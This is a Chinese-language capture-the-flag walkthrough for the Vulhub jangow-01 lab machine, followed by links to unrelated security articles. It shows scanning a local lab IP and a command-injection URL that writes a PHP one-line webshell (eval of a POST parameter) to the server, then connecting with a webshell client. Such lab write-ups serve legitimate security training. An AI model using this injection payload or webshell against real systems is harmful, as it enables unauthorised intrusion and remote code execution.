Vulhub-jangow-01-1.0.1通关攻略

第0步:

打开靶机,按下shift,出现下图界面

在此页面按下e键,进入如下界面, 将ro 替换为 rw signie init=/bin/bash

替换完毕后,按下Ctrl键+X键,进入如下页面

ip a查看网卡信息

编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠

第一步:确定靶机IP为192.168.179.129
第二步:扫描后台及开放端口
第三步:进行敏感目录及文件扫描
复制代码
#200
http://192.168.179.129/site/index.html (CODE:200|SIZE:10190) 
http://192.168.179.129/site/wordpress/index.html (CODE:200|SIZE:10190) 

#端口
192.168.179.129:80
192.168.179.129:21
第四步:访问扫描出来的可能有价值的文件及端口
第五步:发现可以传参的地方,尝试传一个id,得到结果
第六步:进一步,尝试上传一句话木马
复制代码
#URL
http://192.168.179.129/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > shell.php
第七步:使用蚁剑进行连接
复制代码
#URL地址
http://192.168.179.129/site/shell.php

FROM IYU_

相关推荐
NOVAnet202310 小时前
云网 + 存储一体化灾备方案解析:南凌科技 × 爱数全景云灾备技术与行业落地价值
科技·web安全·企业数字化·企业sd-wan·混合云网络
SLD_Allen12 小时前
Garak:NVIDIA开源的LLM安全“体检”工具
安全·ai
Hiyajo pray14 小时前
SDN 访问控制性能调优方法
服务器·网络·网络安全
辣椒思密达15 小时前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro
2401_8541515516 小时前
嵌入式 Bootloader 与 OTA 固件升级深度解析——从 Flash 分区到安全回滚
开发语言·stm32·单片机·嵌入式硬件·安全·php
satadriver17 小时前
手工加载API函数
安全
SLD_Allen17 小时前
Purple Llama:Meta开源的LLM安全“紫队”工具箱
安全·开源·llama
Sirius Wu17 小时前
OpenClaw Cron安全约束完整详解
人工智能·安全·aigc
数据知道18 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
Gyr018 小时前
关于证书站捡洞这一档事
安全·web安全